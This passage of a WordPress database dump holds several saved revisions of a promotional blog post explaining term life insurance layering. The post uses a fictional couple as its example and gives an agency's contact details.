#ffffff;\">-</span>\r\n<div><img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<ul>\r\n 	<li style=\"list-style-type: none;\">\r\n<ul>\r\n 	<li>$500,000 for his mortgage with 10 years left</li>\r\n 	<li>$300,000 for his two children’s college expenses ($150,000 each)</li>\r\n 	<li>$200,000 in the event of his death so Terri will be taken care of</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" /><strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:08:45','2023-03-21 14:08:45','',436,'http://cmdev-site1.com/?p=439',0,'revision','',0),(441,3,'2023-03-21 14:10:10','2023-03-21 14:10:10','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div><img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<ul>\r\n 	<li style=\"list-style-type: none;\">\r\n<ul>\r\n 	<li>$500,000 for his mortgage with 10 years left</li>\r\n 	<li>$300,000 for his two children’s college expenses ($150,000 each)</li>\r\n 	<li>$200,000 in the event of his death so Terri will be taken care of</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" /><strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:10:10','2023-03-21 14:10:10','',436,'http://cmdev-site1.com/?p=441',0,'revision','',0);
INSERT INTO `wpfi_posts` VALUES (442,3,'2023-03-21 14:10:58','2023-03-21 14:10:58','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div><img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<ul>\r\n 	<li style=\"list-style-type: none;\">\r\n<ul>\r\n 	<li>$500,000 for his mortgage with 10 years left</li>\r\n 	<li>$300,000 for his two children’s college expenses ($150,000 each)</li>\r\n 	<li>$200,000 in the event of his death so Terri will be taken care of</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" /><strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:10:58','2023-03-21 14:10:58','',436,'http://cmdev-site1.com/?p=442',0,'revision','',0),(443,3,'2023-03-21 14:12:02','2023-03-21 14:12:02','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<ul>\r\n 	<li style=\"list-style-type: none;\">\r\n<ul>\r\n 	<li>$500,000 for his mortgage with 10 years left</li>\r\n 	<li>$300,000 for his two children’s college expenses ($150,000 each)</li>\r\n 	<li>$200,000 in the event of his death so Terri will be taken care of</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" /><strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:12:02','2023-03-21 14:12:02','',436,'http://cmdev-site1.com/?p=443',0,'revision','',0),(446,3,'2023-03-21 14:16:18','2023-03-21 14:16:18','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality, and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<p style=\"padding-left: 320px;\">• $500,000 for his mortgage with 10 years left\r\n• $300,000 for his two children’s college expenses ($150,000 each)\r\n• $200,000 in the event of his death so Terri will be taken care of</p>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" /><strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Termlifeadvice.com, 2018\r\n</span></em><em><span style=\"font-size: 8pt;\">2. NerdWallet, 2017</span></em>\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:16:18','2023-03-21 14:16:18','',436,'http://cmdev-site1.com/?p=446',0,'revision','',0),(444,3,'2023-03-21 14:14:17','2023-03-21 14:14:17','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality, and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<ul>\r\n 	<li style=\"list-style-type: none;\">\r\n<ul>\r\n 	<li>$500,000 for his mortgage with 10 years left</li>\r\n 	<li>$300,000 for his two children’s college expenses ($150,000 each)</li>\r\n 	<li>$200,000 in the event of his death so Terri will be taken care of</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span 